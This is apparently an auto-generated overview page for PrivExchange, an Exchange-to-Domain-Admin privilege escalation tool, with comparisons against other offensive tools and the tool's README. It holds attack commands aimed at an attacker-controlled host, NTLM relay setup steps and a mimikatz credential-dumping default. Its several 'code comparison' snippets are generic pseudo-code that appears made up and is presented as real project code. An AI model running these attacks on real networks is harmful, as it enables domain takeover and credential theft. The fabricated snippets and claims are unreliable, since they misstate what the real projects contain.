Convert Figma logo to code with AI

dirkjanm logoPrivExchange

Exchange your privileges for Domain Admin privs by abusing Exchange

1,003
173
1,003
2
View on GitHub

Top Related Projects

FuzzySecurity's avatar

PowerShell-Suite

2,639

My musings with PowerShell

fortra's avatar

impacket

13,804

Impacket is a collection of Python classes for working with network protocols.

PowerShellMafia's avatar

PowerSploit

12,049

PowerSploit - A PowerShell Post-Exploitation Framework

GhostPack's avatar

Rubeus

4,254

Trying to tame the three-headed dog.

gentilkiwi's avatar

mimikatz

19,927

A little tool to play with Windows security

SpecterOps's avatar

BloodHound-Legacy

10,006

Six Degrees of Domain Admin

Quick Overview

PrivExchange is a proof-of-concept tool designed to exploit a vulnerability in Microsoft Exchange servers. It allows an attacker with a low-privileged domain account to gain Domain Admin privileges by abusing Exchange's delegation rights. This tool demonstrates the potential security risks associated with misconfigured Exchange servers in Active Directory environments.

Pros

  • Highlights a critical security vulnerability in Exchange server configurations
  • Provides a practical demonstration of privilege escalation techniques
  • Useful for security researchers and penetration testers to assess Exchange security
  • Raises awareness about the importance of proper Exchange server configuration

Cons

  • Can be misused by malicious actors if not handled responsibly
  • Requires access to a domain account, limiting its applicability in some scenarios
  • May not work on patched or properly configured Exchange servers
  • Could potentially cause unintended disruptions if used improperly

Code Examples

# Example 1: Setting up the relay
relay = SMBRelayServer(args.relay, args.attackerip)
relay.start()

This code initializes the SMB relay server, which is crucial for the attack.

# Example 2: Performing the NTLM relay attack
httpattack = HTTPAttack(args.target, args.username, args.password, args.domain, args.hashes, args.attackerip, args.exchangemailbox, args.ssl)
httpattack.run()

This snippet executes the NTLM relay attack against the target Exchange server.

# Example 3: Cleaning up after the attack
print('[*] Cleaning up...')
conn = LDAP(args.target, get_user_info=False, authentication=NTLM)
conn.login(args.username, args.password, args.domain, args.hashes)

This code performs cleanup operations after the attack, including logging into the target LDAP server.

Getting Started

To use PrivExchange:

  1. Clone the repository:

    git clone https://github.com/dirkjanm/PrivExchange.git

  2. Install dependencies:

    pip install -r requirements.txt

  3. Run the tool:

    python privexchange.py -ah [attacker_ip] -u [username] -d [domain] [target_exchange]

Note: Use this tool responsibly and only on systems you have permission to test.

Competitor Comparisons

FuzzySecurity logo

PowerShell-Suite

2,639

My musings with PowerShell

Pros of PowerShell-Suite

  • Broader scope: Offers a comprehensive collection of PowerShell scripts for various security tasks
  • More versatile: Can be used for multiple purposes beyond privilege escalation
  • Active development: Regularly updated with new scripts and features

Cons of PowerShell-Suite

  • Less focused: Not specifically tailored for Exchange privilege escalation like PrivExchange
  • Steeper learning curve: Requires more time to understand and utilize the diverse set of tools
  • Potentially more complex setup: May need additional dependencies for certain scripts

Code Comparison

PrivExchange (Python):

def exploit(args):
    # [...]
    dce = get_dce_rpc(args.target, args.username, args.password, args.domain)
    # [...]

PowerShell-Suite (PowerShell):

function Invoke-MS16-032 {
    [CmdletBinding(DefaultParameterSetName='Cmd')]
    param(
        [String]$Command = "cmd.exe /c whoami /all"
    )
    # [...]
}

The code snippets show that PrivExchange is written in Python and focuses on Exchange-specific exploitation, while PowerShell-Suite uses PowerShell and offers a wider range of security-related functions.

fortra logo

impacket

13,804

Impacket is a collection of Python classes for working with network protocols.

Pros of Impacket

  • Broader scope: Impacket is a comprehensive collection of Python classes for working with network protocols, offering a wide range of tools and functionalities beyond just Exchange server exploitation
  • Active development: Impacket is regularly updated and maintained, with a large community of contributors
  • Extensive documentation: Provides detailed explanations and examples for using its various modules and tools

Cons of Impacket

  • Steeper learning curve: Due to its extensive feature set, Impacket may require more time to master compared to the more focused PrivExchange
  • Larger codebase: The comprehensive nature of Impacket results in a larger and more complex codebase, which may be overwhelming for users seeking a specific functionality

Code Comparison

PrivExchange (exploit.py):

def exploit(args):
    # Exploitation logic specific to Exchange server vulnerability
    # ...

Impacket (exchanger.py):

class ExchangeRelayClient:
    def __init__(self, target, username, password, domain):
        # Initialize Exchange client with more flexible options
        # ...

The code snippets illustrate that PrivExchange is more focused on a specific exploit, while Impacket provides a more versatile and extensible framework for working with Exchange and other network protocols.

PowerShellMafia logo

PowerSploit

12,049

PowerSploit - A PowerShell Post-Exploitation Framework

Pros of PowerSploit

  • Broader scope: Offers a comprehensive suite of post-exploitation tools
  • Extensive documentation and community support
  • Regular updates and contributions from multiple developers

Cons of PowerSploit

  • Larger footprint: May be more easily detected by security software
  • Requires PowerShell execution, which might be restricted in some environments
  • More complex to use for specific tasks compared to PrivExchange

Code Comparison

PrivExchange (Python):

def exploit(args):
    if args.attacker_port is None:
        args.attacker_port = 80
    # ... (exploit code)

PowerSploit (PowerShell):

function Invoke-Mimikatz
{
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
        [Alias('Module')]
        [ValidateSet('sekurlsa','kerberos','crypto','vault','process','service','lsadump','ts','event','misc','privilege','sid','token','cache')]
        [String[]]
        $Command = 'sekurlsa::logonpasswords'
    )
    # ... (function implementation)
}

The code comparison shows that PrivExchange is more focused on a specific exploit, while PowerSploit provides a broader range of functionalities with more complex command structures.

GhostPack logo

Rubeus

4,254

Trying to tame the three-headed dog.

Pros of Rubeus

  • More versatile tool for Kerberos ticket manipulation and attacks
  • Actively maintained with regular updates and new features
  • Supports a wider range of Kerberos-related operations

Cons of Rubeus

  • More complex to use, requiring deeper understanding of Kerberos
  • Primarily focused on Windows environments
  • Larger codebase, potentially more challenging to audit

Code Comparison

PrivExchange (Python):

def exchange_attack(self, host, username, password, domain):
    # Simplified attack logic
    self.connect(host)
    self.authenticate(username, password, domain)
    self.perform_exchange()

Rubeus (C#):

public static void PerformKerberosAttack(string target, string user, string password)
{
    // Simplified attack logic
    var ticket = RequestTicket(target, user, password);
    ManipulateTicket(ticket);
    UseTicket(ticket);
}

While PrivExchange focuses specifically on exploiting Exchange servers, Rubeus offers a broader set of Kerberos-related functionalities. PrivExchange is simpler to use for its specific purpose, while Rubeus provides more flexibility but requires more expertise. The code snippets illustrate the difference in approach and complexity between the two tools.

gentilkiwi logo

mimikatz

19,927

A little tool to play with Windows security

Pros of Mimikatz

  • More comprehensive toolkit for Windows credential extraction and manipulation
  • Supports a wider range of attack vectors and techniques
  • Actively maintained with frequent updates and new features

Cons of Mimikatz

  • Larger footprint and more complex to use
  • More likely to be detected by antivirus software
  • Requires administrative privileges for most operations

Code Comparison

PrivExchange (Python):

def exchange_attack(target, attacker, exchange, username, password, domain, auth):
    # Simplified attack logic
    print("[*] Attacking %s as %s\\%s" % (exchange, domain, username))
    # ... (attack implementation)

Mimikatz (C):

NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
{
    LPCWSTR szUser = NULL, szGuid = NULL, szDc = NULL;
    DWORD dwFlags = 0;
    // ... (DCSync implementation)
}

PrivExchange focuses on a specific Exchange Server vulnerability, while Mimikatz offers a broader range of credential manipulation techniques. PrivExchange is written in Python, making it more accessible for scripting and integration, whereas Mimikatz is written in C for lower-level system access and performance. PrivExchange is generally easier to use for its specific purpose, while Mimikatz provides more flexibility but requires more expertise to utilize effectively.

SpecterOps logo

BloodHound-Legacy

10,006

Six Degrees of Domain Admin

Pros of BloodHound-Legacy

  • More comprehensive Active Directory reconnaissance tool
  • Visualizes attack paths and relationships in AD environments
  • Actively maintained with a larger community and support base

Cons of BloodHound-Legacy

  • More complex setup and usage compared to PrivExchange
  • Requires more resources and time to run full analysis
  • May generate more noise in the network, potentially triggering alerts

Code Comparison

BloodHound-Legacy (PowerShell):

Import-Module .\BloodHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\BloodHound

PrivExchange (Python):

python privexchange.py -ah attacker-hostname.com exchange-server.domain.com

BloodHound-Legacy offers a more comprehensive approach to Active Directory analysis, providing visual representations of attack paths and relationships. It's actively maintained and has a larger community. However, it's more complex to set up and use compared to PrivExchange, which focuses specifically on exploiting Exchange privileges. BloodHound-Legacy may also generate more network traffic, potentially triggering alerts. PrivExchange, being more targeted, is simpler to use but has a narrower scope. The code comparison shows the difference in complexity, with BloodHound-Legacy requiring module import and more parameters, while PrivExchange has a simpler command-line interface.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

PrivExchange

POC tools accompanying the blog Abusing Exchange: One API call away from Domain Admin.

Requirements

These tools require impacket. You can install it from pip with pip install impacket, but it is recommended to use the latest version from GitHub.

privexchange.py

This tool simply logs in on Exchange Web Services to subscribe to push notifications. This will make Exchange connect back to you and authenticate as system.

httpattack.py

Attack module that can be used with ntlmrelayx.py to perform the attack without credentials. To get it working:

  • Modify the attacker URL in httpattack.py to point to the attacker's server where ntlmrelayx will run
  • Clone impacket from GitHub git clone https://github.com/SecureAuthCorp/impacket
  • Copy this file into the /impacket/impacket/examples/ntlmrelayx/attacks/ directory.
  • cd impacket
  • Install the modified version of impacket with pip install . --upgrade or pip install -e .